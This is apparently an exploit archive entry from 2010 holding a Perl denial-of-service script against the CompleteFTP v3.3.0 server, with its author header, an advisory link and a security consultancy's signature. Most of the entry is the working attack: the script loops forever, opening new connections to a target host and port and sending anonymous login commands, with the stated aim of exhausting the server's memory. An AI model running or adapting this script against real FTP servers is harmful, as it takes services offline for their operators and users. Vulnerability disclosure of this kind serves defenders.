CompleteFTP v3.3.0 - Remote Memory Consumption DoS

2010-04-2600:00:00

vulners.com

JSON

#!/usr/bin/perl

Title: CompleteFTP v3.3.0 - Remote Memory Consumption DoS

Author: Jonathan Salwan <[email protected]>

Web: http://www.shell-storm.org | http://www.sysdream.com

Advisories: http://www.sysdream.com/article.php?story_id=331&section_id=78

~60 sec for satured ~2Go RAM

use IO::Socket;

print "\n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoS\n";

    if &#40;@ARGV &lt; 1&#41;
            {
            print &quot;[-] Usage: &lt;file.pl&gt; &lt;host&gt; &lt;port&gt;&#92;n&quot;;
            print &quot;[-] Exemple: file.pl 127.0.0.1 21&#92;n&#92;n&quot;;
            exit;
            }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];
    $login  = &quot;USER anonymous&#92;r&#92;n&quot;;
    $pwd    = &quot;PASS anonymous&#92;r&#92;n&quot;;

    $socket = IO::Socket::INET-&gt;new&#40; Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt; &quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;&#41; || die &quot;[-] Connecting: Failed!&#92;n&quot;;

    print &quot;Please Wait...&#92;n&quot;;

    while&#40;&#41;{
            $socket = IO::Socket::INET-&gt;new&#40; Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt; &quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;&#41;;
            $socket-&gt;recv&#40;$answer,2048&#41;;
            $socket-&gt;send&#40;$login&#41;;
            $socket-&gt;send&#40;$pwd&#41;;
            }

–
Mehdi Mahdjoub
Consultant Sysdream IT Security
Responsable communication
Webmaster

Sysdream
4 Impasse de la gendarmerie
93400 Saint Ouen
France